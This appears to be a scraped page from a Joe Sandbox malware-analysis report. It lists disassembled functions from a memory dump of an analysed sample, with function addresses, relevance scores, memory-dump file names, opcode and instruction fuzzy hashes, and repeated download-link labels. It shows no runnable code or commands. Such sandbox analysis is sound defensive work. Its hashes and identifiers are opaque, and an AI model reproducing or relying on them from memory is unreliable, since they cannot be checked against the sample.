                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: xYI$I?f
                                  • API String ID: 0-3719876894
                                  • Opcode ID: 7a42fb7f8457344cc54553353f2d2abe2ac52647b233b84aef0cf432a32f9b19
                                  • Instruction ID: 48a2bda7a7710f177c836dc0e8df23b9a9b6b7ec1a69865f274152387362fa9e
                                  • Opcode Fuzzy Hash: 7a42fb7f8457344cc54553353f2d2abe2ac52647b233b84aef0cf432a32f9b19
                                  • Instruction Fuzzy Hash: 515158B36082045BE7047A2EEC45B3BF7DAEBD4320F1A453EE68583344F87558068292
                                  Function 00ADBF3F Relevance: 2.3, Strings: 1, Instructions: 1031COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: J>
                                  • API String ID: 0-1419416990
                                  • Opcode ID: ef334663174c6d3c06d977497beaea47a4ce56bc81050f4fbe44e4e0683a3efd
                                  • Instruction ID: ce78305e6a2aaf3fa5e29597e1171a36414d87c710b31793e169acc154306fe9
                                  • Opcode Fuzzy Hash: ef334663174c6d3c06d977497beaea47a4ce56bc81050f4fbe44e4e0683a3efd
                                  • Instruction Fuzzy Hash: 3962E2F3A0C204AFE314AE2DEC8577ABBE5EF94720F16493DEAC483740E63558158697
                                  Function 00A268E8 Relevance: 1.5, Strings: 1, Instructions: 239COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: q=*
                                  • API String ID: 0-3368229546
                                  • Opcode ID: 3eef273006ad98eb3a180d7da674a70c82d57a8ff7525df1269f0889f2b8558d
                                  • Instruction ID: 25b6142c4d288a328e96cd93331998c7a67f22eb29ac89a5e0d3ff6593d97fe0
                                  • Opcode Fuzzy Hash: 3eef273006ad98eb3a180d7da674a70c82d57a8ff7525df1269f0889f2b8558d
                                  • Instruction Fuzzy Hash: 3371F4F3A086009FF3089E29DD4573AB6D6EBD4720F1A863DEBC4873C4ED3858058696
                                  Function 009E0015 Relevance: 1.5, Strings: 1, Instructions: 228COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Npn
                                  • API String ID: 0-3325910681
                                  • Opcode ID: dd012e6b0ab60cd16b94ddd6ce9159530d836cbb2812bae6c4ef44ec9f62de31
                                  • Instruction ID: 995e1cf6f6a1e8e544a8d5806ca6192de53cf1d10fe089f15b4a40ffe47ef698
                                  • Opcode Fuzzy Hash: dd012e6b0ab60cd16b94ddd6ce9159530d836cbb2812bae6c4ef44ec9f62de31
                                  • Instruction Fuzzy Hash: 0E6128F3E182085BE300AA6DEC0577AB7D9DBD4320F16893EE7C4D3340F97958058296
                                  Function 00AC2404 Relevance: 1.4, Strings: 1, Instructions: 168COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 3d{;
                                  • API String ID: 0-4056195766
                                  • Opcode ID: b97a19958b020a27e2ce288e2a503da7d7afbf7063e61b9bd2eec6f885628473
                                  • Instruction ID: 2d7d297b022e9012e97b3f10ae0ae539e803a66e1638212dbfa08c71720fab5d
                                  • Opcode Fuzzy Hash: b97a19958b020a27e2ce288e2a503da7d7afbf7063e61b9bd2eec6f885628473
                                  • Instruction Fuzzy Hash: 67414DF3B186141BF7089A3EED5573A76C6DBD0320F2A813EEA85D73C8EC7958054285
                                  Function 00AD3F3D Relevance: .6, Instructions: 615COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 31f4a84dc0c7f9df82774135e76fe18ef18fe4a5b78486e649917d00862d7a1e
                                  • Instruction ID: b189ffbc8ecafe40775e1046181767b4410b44a4cb1cf442044aa307bb863d99
                                  • Opcode Fuzzy Hash: 31f4a84dc0c7f9df82774135e76fe18ef18fe4a5b78486e649917d00862d7a1e
                                  • Instruction Fuzzy Hash: 0412C1F360C6049FE304AF29EC8167AFBE9EF94320F1A893DE5C4C2744E67599458A53
                                  Function 00A840D8 Relevance: .2, Instructions: 244COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 55a4a92cefee788cb6835596aa6d026bacaaf3185e1a715859875459c99abdf3
                                  • Instruction ID: 937c91c9b76c7cc9eff6cfa79dca54a8874d62c921adb26c7307d0b487f094c9
                                  • Opcode Fuzzy Hash: 55a4a92cefee788cb6835596aa6d026bacaaf3185e1a715859875459c99abdf3
                                  • Instruction Fuzzy Hash: 1B7117F39085105BE304AE2ADC4577AFBE5EFD4720F2B853DDAC997344DA398C068682
                                  Function 009D5DDD Relevance: .2, Instructions: 207COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b4d8a5472aa5c03d5bb61eca659d2404a8ec0a876134c206240fbdbbe590042d
                                  • Instruction ID: 8b4474ff225e7e7c59ef96feb9301bacbe963e8f723021b759b6de6181cbc27e
                                  • Opcode Fuzzy Hash: b4d8a5472aa5c03d5bb61eca659d2404a8ec0a876134c206240fbdbbe590042d
                                  • Instruction Fuzzy Hash: E35108F3A087085BE300BE6DDC8476ABBD6EF95320F1B853DDAC8C3744E97959048696
                                  Function 009B4551 Relevance: .2, Instructions: 197COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9c8b2933a495ca41eb655f30fea04003ae233552dbf3ab72b98a1f42b7306100
                                  • Instruction ID: 0782c504de9ec108ed4a19c8ddfeba12ab614b1cc645206fa9f6e6a41da7e8ea
                                  • Opcode Fuzzy Hash: 9c8b2933a495ca41eb655f30fea04003ae233552dbf3ab72b98a1f42b7306100
                                  • Instruction Fuzzy Hash: A25123B3E081145BE308653DEC2577B768A9BD0720F2A463EEA86D3BC4ED7898054295
                                  Function 00AF25FB Relevance: .2, Instructions: 185COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e38b2f0ff699e5a4dc29c878c44329b1bd3dc95dcb2f20afd2ee8aeb98e00259
                                  • Instruction ID: b58a05a19e033b4411a1a3571989d2705f5a813ca0acea1ab5606e5e2f160ecc
                                  • Opcode Fuzzy Hash: e38b2f0ff699e5a4dc29c878c44329b1bd3dc95dcb2f20afd2ee8aeb98e00259
                                  • Instruction Fuzzy Hash: A651F8B260C21CEFD3006A98DC81B7ABBF8E754360F31493AF7C6D7200E2615851A7D6
                                  Function 009FF1EB Relevance: .2, Instructions: 166COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 79bb3946828496045339d317bface7fdc18d18e0cb6d1d90b1624f78f4eb5c84
                                  • Instruction ID: e49f4f09315eb014b258b773db571bcd638a3177de6a05f729b0c103b430d3ad
                                  • Opcode Fuzzy Hash: 79bb3946828496045339d317bface7fdc18d18e0cb6d1d90b1624f78f4eb5c84
                                  • Instruction Fuzzy Hash: C75127F3B091006FE3045929DC45767BBDBEBE4320F2A853DE6C4D7798E97898028282
                                  Function 0099D076 Relevance: .2, Instructions: 150COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a750a43a9d16dd898841b8573ea0129881e1277b3a7e48d06693ad0b9c56ad1f
                                  • Instruction ID: 4b271d7512adaaf27cc274eed7af499d9f9ef7194ab937620304354cfa08ab83
                                  • Opcode Fuzzy Hash: a750a43a9d16dd898841b8573ea0129881e1277b3a7e48d06693ad0b9c56ad1f
                                  • Instruction Fuzzy Hash: DA41AAF7B1860C9BE308692DEC8467BB78ADBD4320F2A833DE681C7708EC759C054191
                                  Function 00DA41D1 Relevance: .1, Instructions: 140COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
